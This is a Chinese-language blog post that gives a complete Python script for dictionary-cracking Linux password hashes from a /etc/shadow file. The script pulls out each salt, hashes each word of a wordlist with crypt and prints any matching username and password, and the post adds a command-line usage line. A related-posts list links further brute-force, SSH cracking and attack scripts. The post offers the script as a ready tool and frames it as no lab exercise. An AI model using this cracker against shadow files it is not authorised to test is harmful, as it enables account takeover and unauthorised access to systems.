python 脚本——linux 密码爆破

已于 2023-11-01 11:45:28 修改
阅读量102 收藏
点赞数 2
分类专栏: python 文章标签: python linux windows
于 2023-11-01 11:00:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134156921
版权

源码

import crypt
import sys
from colorama import Fore

# argv 接收输入
user_dictionary=sys.argv[1]
password_dictionary=sys.argv[2]


def compare(user_dictionary,password_dictionary):
    with open(password_dictionary) as f:
        # 遍历密码本的每一条密码
        for pwd_line in f:
            with open(user_dictionary) as f2:
                # 遍历 shadow 文件中的每日一条数据
                for shadow_line in f2:
                    shadow_line_list = shadow_line.strip().split(":")
                    # 截取用户名
                    name = shadow_line_list[0]
                    # 截取密码 hash 值
                    hash = shadow_line_list[1]
                    # 筛选有密码的用户
                    if hash!="*" and hash !="!" and hash != "!*":
                        # 提取盐值
                        salt = hash[hash.find("$"):hash.rfind("$") + 1]
                        # 将密码本中原密码 hash
                        password_hash = crypt.crypt(pwd_line.strip(), salt)
                        # 判断 hash 后的密码本中的密码是否与目标密码匹配
                        if password_hash == hash:
                            # 匹配成功输出绿色字体,直接跳出函数
                            print(Fore.GREEN + f"[+] {name} 的密码是 {pwd_line}")
                            return
                        else:
                            print(f"[-] 尝试 {pwd_line}", end="")

compare(user_dictionary,password_dictionary)

使用

脚本命名为 pass.py

python pass.py shadow字典 密码字典

image-20231101113358453

gjl_
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali Linux渗透测试——密码破解
Captain_RB的博客
07-27 1万+
Kali Linux渗透测试——密码破解 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 当目标系统无任何已知漏洞时,可以考虑社会工程学或者获取目标系统的用户身份,通过合法账户登录可以绕过系统的安全防线。账户登录身份认证包括账号密码、passphrase、密保、手机、指纹、声纹、面部识别等,其中账号密码是安全级别较低的认证方式,基于互联网的身份认证仍以账号密码为主要形式。 密...
Python武器库开发-Linux系统ssh暴力破解密码自动断阻器(二十)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-13 167
【代码】Python武器库开发-Linux系统ssh暴力破解密码自动断阻器(二十)
python暴破Linux用户密码
我是齐潇啊
03-08 1416
1.必备知识 1.1Linux用户密码存放 路径:/etc/shadow 格式:以“:’为分割号 账号名称:密码(已经经过编码,*就是没有密码):最近更改密码日期:密码不可改动的天数:密码需要改动的天数:密码需要改动期限前的警告天数:密码过期宽限天数:账号失效日期:保留 1.2密码格式 $X$salt$encode X:使用的哈希算法,1是MD5,5是SHA-256,6是SHA-512 salt:盐值,用来给密码加密的 encode:hash值,是由密码和盐值加密后得到的 举个例子.
python自动登录SSH(暴力破解局网LINUX服务器登录密码
问道·六韬
11-01 3086
# -*- coding: utf-8 -*- import paramiko import os client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #client.connect('192.168.8.248', 22, username='root', passw
Linux如何写简单shell脚本、用户提权、暴力破解密码
年轻秃了头的博客
12-07 1556
一、shell脚本 脚本的特点是后缀是.sh for循环格式: for i(变量名) in 范围 do 循环体 (命令)$! 【echo user$! | passwd --stdin user$!】 //后面可以加&>>/dev/null 【echo “user$!创建成功 ,密码是user$!”】——这个位置只能用双引号 Done 引用值是$! 脚本只支持非交互式命令 &>>/dev/nnull 打印出的内容扔到回收站 打开脚本的命令用bash 二、 用
python——ssh多线程爆破脚本
地址ch3nye.top
02-09 2608
今天花了一下午写了个爆破ssh的多线程脚本,debug到新闻联播,队大佬来说是个辣鸡脚本,我在这记录一下,如有需要可以拿去用。 可以直接clone我的github:https://github.com/1344098010/BruteForceSSH 说明 环境python3.7 windows和linux均可运行  爆破程序入口 start.py  PS F:\SSHBF&g...
python脚本
十一.的博客
09-18 67
2.读取rgb 创建图片。buuctf:千层套。
“人生苦短,我用Python“——身份认证攻击
weixin_42902126的博客
11-05 2611
目前最常见的身份认证模式采用的仍然是“用户名+密码”的方式,用户自行设定密码,在登录时如果输入正确的密码,计算机就会认为操作者是合法用户。 但是这种认证方式的缺陷也很明显,如何保证密码不被泄露以及不被破解和已经成为网络安全的最大问题之一。本章中将介绍基于Python实现的密码破解。密码破解是指利用各种手段获得网络、系统或资源密码的过程。网络上很多常见的应用都采用了密码认证模式,例如FTP、Telnet、SSH等,这些应用被广泛地应用在各种网络设备上,如果这些认证模式出现了问题,那就意味着网络中的大量设备将会
AWD竞赛脚本大全——从攻击到防御
热门推荐
Mark的博客
03-27 1万+
一、Waf通防 使用方法,在需要防护的文件中包含该文件 使用require_once(‘waf.php’); 或者include(‘waf.php’); <?php header('Content-Type: text/html; charset=utf-8'); error_reporting(0); define('LOG_FILENAME', 'Attack_Big_information.txt'); function waf() { if (!function_exists(
python之——使用python编写爆破脚本
12-21
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): ""...
Python脚本暴力破解栅栏密码
01-21
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e...
Python脚本——获取某宝货物价格
06-08
综合利用selenium、pyquery、time等第三方模块,模拟实现浏览器点击淘宝搜索页面,自动化跳转页面,获取商品信息等操作
python项目——智慧校园考试系统.zip
04-15
python项目——智慧校园考试系统.zip python项目——智慧校园考试系统.zip python项目——智慧校园考试系统.zip python项目——智慧校园考试系统.zip python项目——智慧校园考试系统.zip python项目——智慧校园...
Python脚本实现对Linux服务器的监控
02-03
目前Linux下有一些使用Python语言编写的Linux系统监控工具比如inotify-sync(文件系统安全监控软件)、glances(资源监控工具)在实际工作中,Linux系统管理员可以根据自己使用的服务器的具体情况编写一下简单实用的...
基于JavaScript 如何实现爬山算法以及优化方案
乐闻世界
06-10 1213
爬山算法(Hill Climbing Algorithm)是一种常见的启发式搜索算法,常用于解决优化问题。其核心思想是从一个初始状态出发,通过逐步选择使目标函数值增大的邻近状态来寻找最优解。接下来,我们将通过 JavaScript 实现一个简单的爬山算法,帮助大家理解其原理和应用。从一个初始状态开始。评估当前状态的目标函数值。在当前状态的邻居中选择一个目标函数值更大的状态。如果找到了更优的邻居,则移动到该邻居并重复步骤2和步骤3。如果没有更优的邻居,则算法结束,当前状态即为局部最优解。
2024.6.13刷题记录
lshx4658的博客
06-14 268
当时没有想到怎么保证队内全都是窗口内的元素,答案:“当队头元素在窗口的左边的时候,弹出队头”,虽然不能保证队内一直没有窗口外的元素,但是能保证使用到的队内元素(队头)全是窗口内元素。当时是有想到这个方法的,但是以为不行,一下没转过来弯。队列储存索引而不是元素,通过储存索引使我们能够快速判断元素是否出窗口。不会,思路来自题解(
使用 Selenium 自动化获取 CSDN 博客资源列表详解
abments的博客
06-14 556
使用 Selenium 自动化获取 CSDN 博客资源列表详解。可以与刷资源浏览量
2024 年最新基于 LLOneBot NT 框架搭建 QQ 机器人详细教程(更新中)
最新发布
唤醒手腕的博客
06-14 321
llonebot(LLOneBot)是一个与OneBot(也称为CQHTTP)协议兼容的机器人框架,它允许开发者使用不同的编程语言(如Python、Go、JavaScript等)编写机器人应用,并与各种支持 OneBot 协议的聊天平台(如QQ、Telegram、Discord等)进行交互。onebot 11 背景。
arcgis pro python3_ArcGis Python脚本——ArcGIS 中使用的 Python 是什么版本
06-08
ArcGIS Pro使用的是Python 3.x版本。具体来说,ArcGIS Pro 2.7使用的是Python 3.8.5版本。与此不同的是,ArcMap和ArcGIS Desktop使用的是Python 2.x版本。因此,在编写ArcGIS Pro的Python脚本时,需要使用Python 3.x语法和模块。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值